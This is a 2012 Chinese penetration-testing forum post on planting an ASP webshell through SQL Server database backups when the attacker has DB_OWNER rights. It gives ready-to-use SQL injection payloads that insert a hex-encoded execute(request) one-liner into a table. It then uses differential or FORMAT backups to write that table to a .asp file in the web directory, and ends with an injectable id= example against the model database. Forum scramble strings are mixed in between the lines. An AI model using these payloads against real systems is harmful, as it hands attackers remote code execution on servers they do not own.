中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
" n3 \8 m+ I$ }
) g9 ?8 g7 w+ w
减少备份文件大小,得到可执行的webshell成功率提高不少
% }2 C3 p/ l# C8 H: l
一利用差异备份
( r: w' h) |7 f' ^9 p4 c+ r
加一个参数WITH DIFFERENTIAL
0 J* u( N3 v% d8 j
% v5 [; V4 Y$ K5 Q/ o
1
& _- B0 e) f2 g9 C
2
) ~2 w3 k" W, M0 F8 I$ s, B
3
1 d% }) O% Z2 C! ~% C9 k: [2 `
4
- w1 L5 i( W/ P3 q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
2 ^% {1 k- v9 \0 _
create table [dbo].[xiaolu] ([cmd] [image]);
% G6 [& ~! `5 z( H+ D
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
5 ^( U; ^& M: R
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
* ]+ U, D' ?- G( A1 _+ ^
|- f9 Y! B4 s% p! r
二利用完全FORMAT
! \2 T: F- W) O( H1 I
加一个参数WITH FROMAT
! i" v0 u6 O; D" R+ A& j4 n' Z- Q5 o
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
$ C4 j1 |' a. s& C2 p2 l3 ^. c% w
; J& M O J0 f+ H- D7 F
1
3 r) b) m0 O" L6 r
2
3 s; K& K$ f1 y5 b2 D+ f% _ u) F: \
3
; Z1 G, Q5 e6 @- r( G
4
8 W7 R, X/ ~8 E! k* n
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
2 n8 U8 g- H/ s8 P( U# G8 I- m
create table [dbo].[xiaolu] ([cmd] [image]);
& c% i. ]0 z; ]# U% A4 @* u
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
, ` ^& L; M& h6 E) F- }
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
( ?" Y( k, i8 B& s
3 X2 O& |# t* g2 g- H1 m' l
总的来说就是那么简单几句,下面以备份数据库model为例子
2 f% T: z# ^0 |/ p" Z2 c: Q' U
1
8 i( p2 A- w; Q! A, f8 ]
( E& e9 B# Y ? V+ h- s2 D
1
4 z! E, `2 t/ u/ `
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
: L' h) q% M5 ^; P
1 Q% q6 s, [) S# o
2
0 t0 ~" b$ P- u
$ l- G8 S7 U6 v4 Z2 h. z- S
1
4 M+ s6 @; c, u* A0 l# e
id=1;backup database model to disk='你的路径‘ with differential,format;--
& j0 Y! k3 v3 ]: H2 z g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2